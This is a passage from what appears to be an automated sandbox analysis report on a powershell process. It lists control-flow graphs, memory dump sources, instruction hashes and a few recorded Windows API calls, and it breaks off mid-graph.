        control_flow_graph 0 3076c48-3076c72 1 3076d0d-3076d3c 0->1 2 3076c78-3076c9b 0->2 12 30782fa-3078301 1->12 5 3076c9d-3076cf6 2->5 6 3076cf9-3076d0b 2->6 5->6 6->1 10 3076d41-3076d50 6->10 16 3076d52-3076d63 10->16 17 3076d69-3076d7d 10->17 16->17 23 3076df3-3076e00 16->23 18 3076d7f-3076dd8 17->18 19 3076ddb-3076ded 17->19 18->19 19->23 24 3076e72-3076e92 19->24 23->24 27 3076e02-3076e2b 23->27 29 3076eb4-3076ec4 24->29 30 3076e94-3076eaf 24->30 27->24 44 3076e2d-3076e6d 27->44 36 3077146-3077153 29->36 37 3076eca-3076ece 29->37 30->12 45 307743d-307745e 36->45 46 3077159-3077177 36->46 39 30770f4-3077141 37->39 40 3076ed4-3076ed8 37->40 39->12 40->39 43 3076ede-3076fdf 40->43 118 3076fe1-3077049 43->118 119 307704f-3077088 43->119 44->12 49 3077466-30774a4 45->49 46->45 53 307717d-3077290 46->53 59 30774a6-3077508 49->59 60 307750b-3077537 49->60 127 3077296-3077336 53->127 128 307733c-3077438 call 3073b70 53->128 59->60 74 30775bd-30775c3 60->74 75 307753d-30775b3 call 3073bc0 60->75 76 3077917-3077929 74->76 77 30775c9-30775cd 74->77 75->74 121 30775b5-30775b8 75->121 89 3077943-3077952 76->89 90 307792b-307793d 76->90 82 30775d3-307769a 77->82 83 3077798-307783d 77->83 150 3077714-3077793 82->150 151 307769c-307770e 82->151 135 30778b7-30778f4 83->135 136 307783f-30778b1 83->136 101 3077a01-3077a16 89->101 102 3077958-3077964 89->102 90->89 90->101 116 3077a1c-3077a72 101->116 117 3077b18-3077b2d 101->117 107 3077966-3077972 102->107 108 3077978-30779fe 102->108 107->101 107->108 108->101 131 3077a74-3077aa0 116->131 132 3077aa2-3077ac6 116->132 133 3077b33-3077bfe 117->133 134 3077cf0-3077d05 117->134 118->119 148 30770b1-30770cb 119->148 149 307708a-30770ac 119->149 121->12 127->128 128->12 138 3077ad0-3077b13 call 3074620 131->138 132->138 241 3077c04-3077c82 133->241 242 3077c88-3077ceb 133->242 152 3077d91-3077da6 134->152 153 3077d0b-3077d8c call 30753f0 134->153 187 30778f7-3077912 135->187 136->135 138->12 148->39 167 30770cd-30770ef 148->167 149->12 150->187 151->150 179 307810f-3078113 152->179 180 3077dac-3077db4 152->180 153->12 167->12 185 3078115-3078118 179->185 186 307811d-3078121 179->186 188 3077db6-3077dbc 180->188 189 3077dcc-3077e0c 180->189 185->12 195 3078127-307812b 186->195 196 3078212-3078216 186->196 187->12 197 3077dc0-3077dc2 188->197 198 3077dbe 188->198 199 3077e0e-3077e3a 189->199 200 3077e3c-3077e60 189->200 195->196 206 3078131-307814f 195->206 204 307822c-3078239 196->204 205 3078218-307822a 196->205 197->189 198->189 208 3077e6a-3077eb3 199->208 200->208 228 3078263-30782f8 204->228 205->204 226 307823b-3078247 205->226 206->196 227 3078155-307816f 206->227 213 3077f17-3077f71 208->213 214 3077eb5-3077f15 208->214 220 3077f77-3077fdb 213->220 214->220 222 307804f-30780b9 220->222 223 3077fdd-307804d 220->223 239 30780bf-307810a call 3074620 222->239 223->239 231 3078251-3078261 226->231 232 3078249-307824f 226->232 244 3078194-30781ae 227->244 245 3078171-307818f 227->245 228->12 231->228 232->228 239->12 241->242 242->12 257 30781d3-30781e0 244->257 258 30781b0-30781ce 244->258 245->12 257->196 268 30781e2-307820d 257->268 258->12 268->12
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.777926899.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_3070000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: D
        • API String ID: 0-193714618
        • Opcode ID: 6e9e6f5ab959fe6cc958a9f0cdb4f5158484dd86b108d63df12f7d817c059c25
        • Instruction ID: 5d45efea2ac2ecb5c6ab5b10f2f78d75f3537cedd968e09b199112834e58279a
        • Opcode Fuzzy Hash: 6e9e6f5ab959fe6cc958a9f0cdb4f5158484dd86b108d63df12f7d817c059c25
        • Instruction Fuzzy Hash: 6DD2A074E012298FDBA5DF29C894BAEB7F6AB88304F1485E9D40DE7351DB349E818F50
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1736 30708e3-3070932 call 3070870 1740 3070934-3070976 1736->1740 1741 307097e-307099a 1736->1741 1740->1741 1746 307099c-30709b8 1741->1746 1747 30709ba-30709e3 1741->1747 1746->1747 1753 3070a2f-3070a8b 1746->1753 1752 30709e5-30709ee 1747->1752 1747->1753 1755 3071786-30718c5 1752->1755 1756 30709f4-3070a2d 1752->1756 1767 3070a92-3070ab9 1753->1767 1768 3070a8d 1753->1768 1756->1752 1756->1753 1775 3070abb-3070acb 1767->1775 1776 3070b19-3070b34 1767->1776 1768->1767 1781 3070c3f-3070c49 1775->1781 1783 3070ad1-3070ae9 1775->1783 1776->1781 1782 3070b3a-3070b59 1776->1782 1784 3070c4f-3070c5f 1781->1784 1785 307171b-307172e 1781->1785 1792 3070b85-3070c3a 1782->1792 1793 3070b5b-3070b80 1782->1793 1783->1781 1794 3070aef-3070b14 1783->1794 1787 3070c65-3070ca8 1784->1787 1788 3070fa2-3070fec call 3071998 1784->1788 1791 3071735-307173b 1785->1791 1817 3070cce-3070cdd 1787->1817 1818 3070caa-3070cb4 1787->1818 1819 3071012-307102a 1788->1819 1820 3070fee-3071010 1788->1820 1795 3071745 1791->1795 1796 307173d 1791->1796 1792->1791 1793->1781 1794->1781 1795->1755 1796->1795 1824 3070ce4-3070d2e 1817->1824 1818->1817 1822 3070cb6-3070cc0 1818->1822 1828 3071215-3071221 1819->1828 1820->1819 1834 307102f-3071067 1820->1834 1822->1817 1827 3070cc2-3070ccc 1822->1827 1849 3070d34-3070d3d 1824->1849 1850 3070eaf-3070f03 1824->1850 1827->1817 1827->1824 1836 3071223-3071253 1828->1836 1837 3071258-3071272 1828->1837 1858 307106d-307106f 1834->1858 1836->1791 1847 3071286-3071298 1837->1847 1848 3071274-3071284 1837->1848 1866 30712d2-30712f4 1847->1866 1867 307129a-30712b8 1847->1867 1848->1847 1861 30712ba-30712cd 1848->1861 1853 3070d43-3070d70 1849->1853 1854 3071730 1849->1854 1872 3070f05-3070f1a 1850->1872 1873 3070f1f-3070f69 1850->1873 1876 3070d76-3070da8 1853->1876 1877 3070e9f-3070ea9 1853->1877 1854->1791 1858->1828 1861->1791 1883 30712f6-307131a 1866->1883 1884 307131f-307134c 1866->1884 1867->1866 1872->1788 1873->1788 1898 3070f6b-3070f8a 1873->1898 1895 3070dae-3070dde 1876->1895 1896 3070e7a-3070e7e 1876->1896 1877->1849 1877->1850 1890 30714ee-307154a 1883->1890 1902 307134e-307135f 1884->1902 1903 3071378-3071395 1884->1903 1926 3071550-3071569 1890->1926 1927 3071678-307168b 1890->1927 1919 3070e02-3070e07 1895->1919 1920 3070de0-3070de4 1895->1920 1896->1877 1900 3070e80-3070e98 1896->1900 1898->1788 1907 3070f8c-3070f9b 1898->1907 1900->1877 1902->1903 1912 3071361-3071372 1902->1912 1916 30714d6-30714e9 1903->1916 1917 307139b-30713c1 1903->1917 1907->1788 1912->1890 1912->1903 1922 30714eb 1916->1922 1936 30713c7-30713e2 1917->1936 1937 307149d-30714d0 1917->1937 1919->1896 1923 3070de6-3070e00 1920->1923 1924 3070e09-3070e12 1920->1924 1922->1890 1923->1919 1923->1924 1932 3070e14-3070e2e 1924->1932 1933 3070e58-3070e74 1924->1933 1938 3071572-307158d 1926->1938 1939 307156b 1926->1939 1929 3071692 1927->1929 1929->1785 1932->1933 1950 3070e30-3070e56 1932->1950 1933->1895 1933->1896 1936->1937 1953 30713e8-307149b 1936->1953 1937->1916 1937->1917 1951 307158f-3071596 1938->1951 1952 307159b-30715ba 1938->1952 1939->1938 1950->1896 1954 3071663-3071672 1951->1954 1952->1954 1961 30715c0-30715c9 1952->1961 1953->1922 1954->1926 1954->1927 1963 30715cf-3071605 1961->1963 1964 307168d 1961->1964 1973 3071607-307161b 1963->1973 1974 3071653-307165d 1963->1974 1964->1929 1973->1974 1977 307161d-307162a 1973->1977 1974->1954 1974->1961 1981 307162c-3071639 1977->1981 1982 307164a-3071651 1977->1982 1981->1982 1986 307163b-3071648 1981->1986 1982->1954 1986->1974 1986->1982
        Memory Dump Source
        • Source File: 00000004.00000002.777926899.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_3070000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6510dba3b81c7fb1d5a94712e07b5a336ec2cf37f08b869bddf92d6f30a6c366
        • Instruction ID: 9d4f88f55e0ded08dd32bdcb9d64535699a3ba89c80007c04645d0cf0ebe4cbd
        • Opcode Fuzzy Hash: 6510dba3b81c7fb1d5a94712e07b5a336ec2cf37f08b869bddf92d6f30a6c366
        • Instruction Fuzzy Hash: C8822934A01219CFDB68DF34C891BADB7B6AF85304F1584A9D506AB3A1DB35ED82CF50
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1991 30788b1-30788bb 1992 30788bd-3078910 1991->1992 1993 307891c-307893a 1991->1993 1992->1993 1996 3078940-3078948 1993->1996 1997 307893c-307893e 1993->1997 1998 307894a-3078951 1996->1998 1997->1998 2000 3078953-307896a 1998->2000 2001 30789ac-30789c4 1998->2001 2000->2001 2008 307896c-30789a4 2000->2008 2006 30789c6-30789d0 2001->2006 2007 30789d2-30789d4 2001->2007 2010 30789d7-30789e0 2006->2010 2007->2010 2008->2001 2024 30789a6-30789a9 2008->2024 2011 30789f4-30789fa 2010->2011 2012 30789e2-30789f2 2010->2012 2015 30789fd-3078a17 2011->2015 2012->2015 2019 3078a5b-3078a70 2015->2019 2020 3078a19-3078a32 2015->2020 2022 3078aa5-3078ab7 2019->2022 2023 3078a72-3078a7c 2019->2023 2020->2019 2028 3078a34-3078a4f call 30794c1 2020->2028 2030 3078ac7-3078adb 2022->2030 2031 3078ab9-3078abc 2022->2031 2023->2022 2025 3078a7e-3078a9f 2023->2025 2024->2001 2025->2022 2032 3078a55 2028->2032 2034 3078ae1-3078af0 2030->2034 2035 3078b9e-3078bb0 2030->2035 2031->2030 2032->2019 2038 3078af2-3078b15 2034->2038 2039 3078b18-3078b2a 2034->2039 2040 3078bb6-3078bd5 2035->2040 2041 30790ce-30790d2 2035->2041 2038->2039 2046 3078b32-3078b3a 2039->2046 2053 3078bd7-3078bf7 2040->2053 2054 3078bfd-3078c2f 2040->2054 2042 30790d4-30790fa 2041->2042 2043 3079102-3079129 2041->2043 2042->2043 2063 30791a0-30791a4 2043->2063 2064 307912b-3079198 2043->2064 2048 3078b42-3078b5c 2046->2048 2049 3078b3c-3078b3f 2046->2049 2066 3078b86-3078b9c 2048->2066 2067 3078b5e-3078b84 2048->2067 2049->2048 2053->2041 2053->2054 2054->2041 2065 3078c35-3078c5c 2054->2065 2068 307927f-307928c 2063->2068 2069 30791aa-3079277 2063->2069 2064->2063 2077 3078f5c-3078f68 2065->2077 2066->2035 2067->2066 2069->2068 2079 3078f6e-3078f75 2077->2079 2080 3078c6d-3078c79 2077->2080 2079->2041 2084 3078f7b-3078f85 2079->2084 2082 3078c7f-3078ca5 2080->2082 2083 30792cb-3079305 2080->2083 2102 3078cab-3078cc8 2082->2102 2103 3078f59 2082->2103 2100 3079307-307930e 2083->2100 2101 307930f-3079314 2083->2101 2084->2041 2087 3078f8b-3078fa0 2084->2087 2096 3078fa6-3078fae 2087->2096 2097 3079065-307906c 2087->2097 2104 3078fc6-3078ffa 2096->2104 2105 3078fb0-3078fb6 2096->2105 2106 307906e-3079076 2097->2106 2107 3079078-30790c8 2097->2107 2109 3079316-307931f 2101->2109 2110 3079321-3079330 2101->2110 2129 3078e00-3078e1d 2102->2129 2130 3078cce-3078d03 2102->2130 2103->2077 2117 3078ffc-3079035 2104->2117 2118 307903b-307905f 2104->2118 2111 3078fba-3078fc4 2105->2111 2112 3078fb8 2105->2112 2106->2041 2107->2041 2109->2110 2124 3079331-307933f 2109->2124 2111->2104 2112->2104 2117->2118 2118->2097 2138 3079377-3079385 2124->2138 2139 3079341-3079376 2124->2139 2147 3078e23-3078e37 2129->2147 2148 3078edb-3078ef4 2129->2148 2159 3078d05-3078d15 2130->2159 2160 3078d2d-3078d38 2130->2160 2150 30793e7-30793ec 2138->2150 2151 3079387-307938c 2138->2151 2147->2103 2165 3078e3d-3078e9e 2147->2165 2148->2103 2175 3078ef6-3078f06 2148->2175 2156 3079421-3079434 2150->2156 2157 30793ee-307941f 2150->2157 2154 307938e-3079398 2151->2154 2155 307939d-30793e5 2151->2155 2173 3079436-307943c 2154->2173 2155->2173 2156->2173 2157->2173 2159->2160 2176 3078d17-3078d27 2159->2176 2179 3078d62-3078dc3 2160->2179 2180 3078d3a-3078d4a 2160->2180 2206 3078ea4-3078ed6 2165->2206 2207 30792ad-30792c4 2165->2207 2191 3078f1a-3078f21 2175->2191 2192 3078f08-3078f18 2175->2192 2176->2103 2176->2160 2212 307928f-30792a6 2179->2212 2213 3078dc9-3078dfb 2179->2213 2180->2179 2193 3078d4c-3078d5c 2180->2193 2198 3078f23-3078f46 2191->2198 2199 3078f4c-3078f52 2191->2199 2192->2103 2192->2191 2193->2103 2193->2179 2198->2199 2199->2103 2206->2103 2207->2083 2212->2207 2213->2103
        Memory Dump Source
        • Source File: 00000004.00000002.777926899.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_3070000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d773f8fe0b625e4dd304736714a22b7bb113fc14b586cd241de00a69aff26ab2
        • Instruction ID: 055c9b4b04bd1c880540d777cfe0b25f691005d19e7e45745cd5df780263980a
        • Opcode Fuzzy Hash: d773f8fe0b625e4dd304736714a22b7bb113fc14b586cd241de00a69aff26ab2
        • Instruction Fuzzy Hash: 3C623934A01218CFDB64DF28C894B9DB7F2BF89214F1985A9D809AB361DB34ED85CF51
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 2227 3074620-307464f 2228 3074652-3074665 2227->2228 2229 3074651 2227->2229 2231 3074667-3074678 2228->2231 2232 30746aa-30746b7 2228->2232 2229->2228 2237 307467b-3074681 2231->2237 2235 3074724-307473a 2232->2235 2236 30746b9-30746bd 2232->2236 2381 307473d call 3074504 2235->2381 2382 307473d call 3074620 2235->2382 2238 30746d0-30746d4 2236->2238 2239 30746bf-30746ce 2236->2239 2240 3074b27-3074b5d 2237->2240 2241 3074687-3074694 2237->2241 2242 30746d6-30746e8 2238->2242 2243 30746ea-30746f6 2238->2243 2239->2235 2239->2238 2257 3074b65-3074b69 2240->2257 2245 3074696 2241->2245 2246 3074698 2241->2246 2258 30746f8-3074721 2242->2258 2243->2258 2244 3074743-307474b 2249 307474d-3074751 2244->2249 2250 307475a-307475c 2244->2250 2251 307469a-30746a8 2245->2251 2246->2251 2249->2250 2253 3074753 2249->2253 2254 3074a06-3074b24 2250->2254 2255 3074762-3074772 2250->2255 2251->2232 2251->2237 2253->2250 2263 307477b-3074795 2255->2263 2260 3074b77-3074b79 2257->2260 2261 3074b6b-3074b74 2257->2261 2258->2235 2265 3074cf3-3074cfc 2260->2265 2266 3074b7f-3074b8b 2260->2266 2275 3074797-30747b3 2263->2275 2276 30747b5-30747cd 2263->2276 2266->2265 2272 3074b91-3074b9d 2266->2272 2272->2265 2279 3074ba3-3074bb9 2272->2279 2275->2276 2288 30747cf-30747ec 2276->2288 2289 30747ee-307480b 2276->2289 2279->2265 2293 3074bbf-3074bd8 2279->2293 2288->2289 2299 307482c-307484d 2288->2299 2289->2299 2300 307480d-307482a 2289->2300 2293->2265 2304 3074bde-3074bed 2293->2304 2300->2299 2310 3074850-30748a5 2300->2310 2304->2265 2311 3074bf3-3074c20 2304->2311 2344 30748a7-30748c8 2310->2344 2345 30748cb-3074a03 2310->2345 2319 3074c22-3074c3c 2311->2319 2320 3074c6b-3074cb0 2311->2320 2325 3074c45-3074c69 2319->2325 2326 3074c3e 2319->2326 2320->2265 2342 3074cb2-3074cc2 2320->2342 2325->2320 2326->2325 2350 3074cd6-3074cf0 call 3074038 2342->2350 2351 3074cc4-3074cd4 2342->2351 2350->2265 2351->2265 2351->2350 2381->2244 2382->2244
        Memory Dump Source
        • Source File: 00000004.00000002.777926899.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_3070000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6d23942fbc4066fcc48d7a1ea687a1e792e112d3eb78b73618200c968d51b0ae
        • Instruction ID: 7c1b454428e4cdb206f188d51fe45c5b033f1d4ac1b472e82d6d45a073353cec
        • Opcode Fuzzy Hash: 6d23942fbc4066fcc48d7a1ea687a1e792e112d3eb78b73618200c968d51b0ae
        • Instruction Fuzzy Hash: 2F127D79B002048FCB54DF69C894AAEB7E7EF98214F158469E906DB361DF38DC05CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 2383 7efbb48-7efbb7e 2386 7efbc2f-7efbc38 2383->2386 2387 7efbb84-7efbbe6 call 7ef7118 2383->2387 2388 7efbc3a-7efbc4d 2386->2388 2389 7efbc67-7efbc6d 2386->2389 2438 7efbbfe-7efbc29 2387->2438 2439 7efbbe8-7efbbee 2387->2439 2397 7efbc4f-7efbc55 2388->2397 2398 7efbc65 2388->2398 2390 7efbc6f-7efbc75 2389->2390 2391 7efbcea-7efbcf1 2389->2391 2393 7efbc78-7efbc80 2390->2393 2395 7efbcf2-7efbd3c 2393->2395 2396 7efbc82-7efbc91 2393->2396 2412 7efc022-7efc032 2395->2412 2413 7efbd42-7efbd46 2395->2413 2400 7efbcaf-7efbce5 2396->2400 2401 7efbc93-7efbcad 2396->2401 2402 7efbc59-7efbc5b 2397->2402 2403 7efbc57 2397->2403 2398->2389 2416 7efbce7-7efbce8 2400->2416 2401->2416 2402->2398 2403->2398 2423 7efc034-7efc051 2412->2423 2424 7efc053-7efc055 2412->2424 2417 7efbd48-7efbd4e 2413->2417 2418 7efbd53-7efbd68 2413->2418 2416->2391 2416->2393 2420 7efc358-7efc35f 2417->2420 2434 7efbd6e 2418->2434 2435 7efbedd-7efbee3 2418->2435 2423->2424 2427 7efc05b-7efc06f 2424->2427 2428 7efc0e6-7efc0e8 2424->2428 2427->2428 2474 7efc071-7efc07d 2427->2474 2431 7efc0ee-7efc0f2 2428->2431 2432 7efc1f4-7efc1fa 2428->2432 2442 7efc15e-7efc178 2431->2442 2443 7efc0f4-7efc10a 2431->2443 2440 7efc29d-7efc2a4 2432->2440 2441 7efc200-7efc207 2432->2441 2434->2435 2445 7efbe9d-7efbea6 2434->2445 2446 7efbe5d-7efbe66 2434->2446 2447 7efbd97-7efbda1 2434->2447 2448 7efbdf6-7efbdff 2434->2448 2449 7efbda6-7efbdaf 2434->2449 2450 7efbd75-7efbd7e 2434->2450 2453 7efbf58-7efbf69 2435->2453 2454 7efbee5-7efbee8 call 7efcfa7 2435->2454 2438->2386 2438->2387 2451 7efbbf2-7efbbf4 2439->2451 2452 7efbbf0 2439->2452 2457 7efc2a6-7efc2ac 2440->2457 2458 7efc2b1-7efc2c7 2440->2458 2455 7efc209-7efc21e 2441->2455 2456 7efc230-7efc23d 2441->2456 2500 7efc17a-7efc180 2442->2500 2501 7efc182-7efc186 2442->2501 2443->2442 2497 7efc10c-7efc146 2443->2497 2466 7efbea8-7efbeab 2445->2466 2467 7efbeb5-7efbed8 2445->2467 2463 7efbe68-7efbe6b 2446->2463 2464 7efbe75-7efbe98 2446->2464 2447->2420 2460 7efbe0e-7efbe58 2448->2460 2461 7efbe01-7efbe04 2448->2461 2470 7efbdbe-7efbdf1 2449->2470 2471 7efbdb1-7efbdb4 2449->2471 2468 7efbd85-7efbd88 2450->2468 2469 7efbd80-7efbd83 2450->2469 2451->2438 2452->2438 2486 7efbf6b-7efbf85 2453->2486 2487 7efbfa5-7efbfb1 2453->2487 2479 7efbeee-7efbef2 2454->2479 2455->2420 2481 7efc23f-7efc251 2456->2481 2482 7efc263-7efc269 2456->2482 2457->2420 2489 7efc2c9-7efc2d2 2458->2489 2490 7efc2d4-7efc2d7 2458->2490 2460->2420 2461->2460 2463->2464 2464->2420 2466->2467 2467->2420 2477 7efbd92 2468->2477 2469->2477 2470->2420 2471->2470 2474->2428 2507 7efc07f-7efc0b3 2474->2507 2477->2420 2493 7efbf1b-7efbf21 2479->2493 2494 7efbef4-7efbf06 2479->2494 2481->2420 2482->2440 2498 7efc26b-7efc277 2482->2498 2526 7efbf87-7efbf91 2486->2526 2527 7efbf96-7efbfa0 2486->2527 2487->2420 2511 7efc2e0-7efc2e2 2489->2511 2490->2511 2493->2453 2496 7efbf23-7efbf2f 2493->2496 2494->2420 2496->2453 2521 7efbf31-7efbf43 2496->2521 2536 7efc148-7efc14e 2497->2536 2537 7efc150-7efc154 2497->2537 2498->2440 2522 7efc279-7efc28b 2498->2522 2512 7efc18b 2500->2512 2501->2512 2507->2428 2540 7efc0b5-7efc0c1 2507->2540 2518 7efc2ea 2511->2518 2519 7efc2e4 2511->2519 2512->2420 2518->2420 2519->2518 2521->2420 2522->2420 2526->2420 2527->2420 2539 7efc159 2536->2539 2537->2539 2539->2420 2542 7efc0d9-7efc0de 2540->2542 2543 7efc0c3-7efc0c9 2540->2543 2542->2428 2544 7efc0cd-7efc0cf 2543->2544 2545 7efc0cb 2543->2545 2544->2542 2545->2542
        Memory Dump Source
        • Source File: 00000004.00000002.810094935.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 79cba98138743787f03888a90de405c1255941260358a1e116673cf38c024f93
        • Instruction ID: 1a170c4bf3ee87949d364e9449ef9f18a41f2f3c9a741addce1494d8e287c968
        • Opcode Fuzzy Hash: 79cba98138743787f03888a90de405c1255941260358a1e116673cf38c024f93
        • Instruction Fuzzy Hash: E52260B4B0120ACFCB14DF64D8949AE77B2FF89304F248469E50AAB764DB31DC55CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1533 4d36661-4d366b2 1536 4d366b4-4d366b7 1533->1536 1537 4d366ba-4d366e5 GetFileAttributesW 1533->1537 1536->1537 1538 4d366e7-4d366ed 1537->1538 1539 4d366ee-4d3670b 1537->1539 1538->1539
        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 04D366D8
        Memory Dump Source
        • Source File: 00000004.00000002.792460045.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_4d30000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: d41e3aaa80101c812197ab05f1ac7918ded01520c9a14b99b88d18d4227026d6
        • Instruction ID: cf59f3116a1e0003e55f49e390a0f34fd8b094d4a9749b5a6f63334a6205723a
        • Opcode Fuzzy Hash: d41e3aaa80101c812197ab05f1ac7918ded01520c9a14b99b88d18d4227026d6
        • Instruction Fuzzy Hash: D52156B1D00219ABCB10CF9AD844ADEFBB4FB48364F10822AD819B7700C774A905CFE5
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1542 4d3565c-4d366b2 1545 4d366b4-4d366b7 1542->1545 1546 4d366ba-4d366e5 GetFileAttributesW 1542->1546 1545->1546 1547 4d366e7-4d366ed 1546->1547 1548 4d366ee-4d3670b 1546->1548 1547->1548
        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 04D366D8
        Memory Dump Source
        • Source File: 00000004.00000002.792460045.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_4d30000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 5f7fdd9e08218c7ac009fc2d9e2e5ac6c62a5f89dc465123cc69cc06df64f22e
        • Instruction ID: 431abc644757e1f8754d333e742612f776306f62b7fc287edb9ee09a573bd30c
        • Opcode Fuzzy Hash: 5f7fdd9e08218c7ac009fc2d9e2e5ac6c62a5f89dc465123cc69cc06df64f22e
        • Instruction Fuzzy Hash: 182106B1D00659ABCB10CF9AD84479EFBB4FB48764F10816AD819B7700D774A944CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1551 7efb3bc-7efe46c RtlEncodePointer 1554 7efe46e-7efe474 1551->1554 1555 7efe475-7efe489 1551->1555 1554->1555
        APIs
        • RtlEncodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,07EFE1D2), ref: 07EFE45F
        Memory Dump Source
        • Source File: 00000004.00000002.810094935.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_7ef0000_powershell.jbxd
        Similarity
        • API ID: EncodePointer
        • String ID:
        • API String ID: 2118026453-0
        • Opcode ID: a768676b20d9be88c4dee254586d6ec55effe1126cc2fc93f99b33b91222c894
        • Instruction ID: e37f3e3f8670db32d51fcdfc6293b56e81987b940cdf79c378d5a29a151ab1ae
        • Opcode Fuzzy Hash: a768676b20d9be88c4dee254586d6ec55effe1126cc2fc93f99b33b91222c894
        • Instruction Fuzzy Hash: EE1115B19006099FCB10DFA9D488BDEFBF4EB48318F10841AD519A7710D374A944CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 1650 3070238-307024f 1652 3070255-3070259 1650->1652 1653 30702dc-30702e0 1650->1653 1652->1653 1654 307025f-30702d7 1652->1654 1655 30702e6-30702ea 1653->1655 1656 30705d1-30705f8 1653->1656 1691 3070630-3070637 1654->1691 1657 30702f0-3070397 1655->1657 1658 307039c-30703a0 1655->1658 1677 3070606-3070608 1656->1677 1678 30705fa-30705fe call 30708e3 1656->1678 1657->1691 1660 30703a6-307044d 1658->1660 1661 3070452-3070457 1658->1661 1660->1691 1664 3070465 1661->1664 1665 3070459-3070463 1661->1665 1667 307046a-307046c 1664->1667 1665->1667 1671 3070472-3070519 1667->1671 1672 307051e-3070522 1667->1672 1671->1691 1672->1656 1673 3070528-30705cf 1672->1673 1673->1691 1685 3070610-3070622 1677->1685 1684 3070604 1678->1684 1684->1685 1690 3070624-3070628 1685->1690 1685->1691 1690->1691
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.777926899.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_3070000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: _k
        • API String ID: 0-4098997981
        • Opcode ID: a718e2284539f6654497b476a41214111a234b5bdc14222592e527ac15626cee
        • Instruction ID: 1ea541c03b65fd5a31f38cf6917d5c4c57a184725cb2be290080ea1f88ea6140
        • Opcode Fuzzy Hash: a718e2284539f6654497b476a41214111a234b5bdc14222592e527ac15626cee
        • Instruction Fuzzy Hash: 94A1C074B012449FDB18AB74E8947BEB6E3EBC8208F04883CD5469B791DF7C9C458B95
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 2547 3076278-30762b0 2548 3076417-3076462 2547->2548 2549 30762b6-30762cf 2547->2549 2554 3076464-307646b 2548->2554 2555 30764a8 2548->2555 2550 30762d4-30762e4 2549->2550 2551 30762d1 2549->2551 2550->2548 2556 30762ea-30762f4 2550->2556 2551->2550 2558 307646d-307647a 2554->2558 2559 307647c 2554->2559 2557 30764ab-30764e7 2555->2557 2560 30762f6-30762f8 2556->2560 2561 3076302-3076310 2556->2561 2573 3076573-307657e 2557->2573 2574 30764ed-30764f6 2557->2574 2562 307647e-3076480 2558->2562 2559->2562 2560->2561 2561->2548 2565 3076316-3076326 2561->2565 2563 3076487-3076489 2562->2563 2564 3076482-3076485 2562->2564 2569 307648b-3076498 2563->2569 2570 307649a 2563->2570 2568 30764a6 2564->2568 2571 307632b-307633b 2565->2571 2572 3076328 2565->2572 2568->2557 2575 307649c-307649e 2569->2575 2570->2575 2571->2548 2586 3076341-307634b 2571->2586 2572->2571 2576 3076580-3076583 2573->2576 2577 307658d-30765af 2573->2577 2574->2573 2578 30764f8-30764fe 2574->2578 2575->2568 2576->2577 2587 30765b5-30765be 2577->2587 2588 307667c-3076760 2577->2588 2581 3076504-3076511 2578->2581 2582 3076828-307687c 2578->2582 2584 3076513-3076549 2581->2584 2585 307656a-3076571 2581->2585 2603 3076566 2584->2603 2604 307654b-307654e 2584->2604 2585->2573 2585->2578 2589 307634d-307634f 2586->2589 2590 3076359-3076367 2586->2590 2587->2582 2592 30765c4-3076605 2587->2592 2636 3076767-30767a0 2588->2636 2589->2590 2590->2548 2594 307636d-307637d 2590->2594 